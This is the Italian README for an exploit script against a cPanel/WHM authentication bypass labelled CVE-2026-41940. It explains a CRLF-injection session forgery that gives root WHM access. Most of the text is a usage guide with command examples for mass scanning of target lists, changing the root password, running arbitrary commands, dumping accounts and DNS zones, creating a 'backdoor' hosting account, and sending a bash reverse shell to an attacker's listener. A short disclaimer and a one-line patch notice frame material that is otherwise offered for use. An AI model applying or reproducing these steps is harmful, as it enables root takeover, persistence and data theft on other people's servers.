
cPanel/WHM Bypass dell'autenticazione (Vulnerabilità zero-day)
Disclaimer: Questo documento e lo script associato (
exploit.py) sono forniti esclusivamente a scopo didattico, di ricerca sulla sicurezza e di test di penetrazione autorizzati. Non utilizzare questo software contro sistemi che non possiedi o per i quali non hai un'autorizzazione esplicita al test.
exploit.py è uno script che dimostra una vulnerabilità di bypass dell'autenticazione (CVE-2026-41940) in cPanel & WHM. La vulnerabilità consente a un attaccante non autenticato di iniettare una sessione root nella cache del daemon tramite un difetto di iniezione CRLF, ottenendo infine accesso WHM a livello root senza richiedere credenziali valide.
L'exploit sfrutta una vulnerabilità di iniezione CRLF (Carriage Return Line Feed) all'interno del meccanismo di gestione dell'Authenticazione di Base, combinata con un difetto di propagazione della sessione. Lo script automatizza l'attacco in quattro fasi:
/login/ o /cgi/login.cgi) per ottenere un cookie di sessione non autenticato di base (whostmgrsession).cpsrvd. La risposta di redirect del server rilascia il token di sicurezza generato (cpsess).do_token_denied per propagare la sessione falsificata nella cache del daemon — rendendola una sessione autenticata valida./json-api/version) utilizzando la sessione falsificata per confermare l'accesso a livello root.requestspip install requests
python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]
| Argomento | Descrizione |
|---|---|
--target URL | Singolo URL WHM (es. https://target:2087) |
--target-file FILE | File con i target (uno ip:port per riga) — abilita automaticamente la modalità check |
| Argomento | Descrizione |
|---|---|
--threads N | Thread concorrenti per la modalità multi-target (default: 10) |
--hostname HOST | Sovrascrive l'header Host — da usare quando l'auto-discovery fallisce o restituisce un hostname errato |
--timeout N | Timeout per richiesta in secondi (default: 15) |
--retries N | Numero di tentativi in caso di errori di rete (default: 3) |
--cookie-name NAME | Forza un nome specifico per il cookie di sessione (rilevato automaticamente se omesso) |
--no-verify | Salta la verifica della Fase 4 e procedi comunque |
| Argomento | Descrizione |
|---|---|
--check | Modalità solo verifica — controlla la vulnerabilità senza sfruttarla (impostata automaticamente con --target-file) |
--password PASS | Cambia la password di root in PASS |
--api FUNC | Chiama una specifica funzione WHM JSON-API |
--api-params K=V,... | Parametri separati da virgola per --api |
--exec CMD | Esegue un comando di sistema tramite WHM scripts/run_script (fallback: rawexec) |
--session | Genera un URL di login root a un clic — aprilo subito, il token scade rapidamente |
--shell | Apre una shell WHM interattiva (solo target singolo) |
--dump | Scarica le informazioni del server: versione, account, zone DNS, privilegi |
--add-user USER PASS DOMAIN | Crea un nuovo account di hosting cPanel |
--revshell LHOST LPORT | Invia una reverse shell bash al tuo listener |
| Argomento | Descrizione |
|---|---|
--output FILE | Salva il token di sessione e i dettagli in un file JSON |
# Verifica se il target è vulnerabile
python exploit.py --target https://target:2087 --check
# Scarica le informazioni del server (versione, account, privilegi)
python exploit.py --target https://target:2087 --dump
# Genera un URL di login root a un clic (incollalo subito nel browser)
python exploit.py --target https://target:2087 --session
# Esegue un comando
python exploit.py --target https://target:2087 --exec "id"
# Apre una shell WHM interattiva
python exploit.py --target https://target:2087 --shell
# Cambia la password di root
python exploit.py --target https://target:2087 --password 'NewP@ss!'
# Chiama direttamente l'API WHM
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1
# Crea un account cPanel backdoor
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com
# Invia una reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444
# Sovrascrive l'hostname (da usare quando l'auto-discovery fallisce)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check
# Scansiona più target (modalità solo verifica)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20
# Salva la sessione in un file
python exploit.py --target https://target:2087 --dump --output results.json
Quando si usa --shell, sono disponibili i seguenti comandi:
| Comando | Descrizione |
|---|---|
api <function> [k=v ...] | Chiama una funzione WHM JSON-API (es. api version) |
exec <command> | Esegue un comando di sistema tramite WHM (es. exec id) |
passwd <newpass> | Cambia la password di root |
dump | Scarica le informazioni del server |
revshell <lhost> <lport> | Invia una reverse shell |
add <user> <pass> <domain> | Crea un account cPanel |
save <path> | Salva la sessione corrente in un file |
exit / quit | Esce dalla shell |
Applica immediatamente le ultime patch di sicurezza di cPanel/WHM.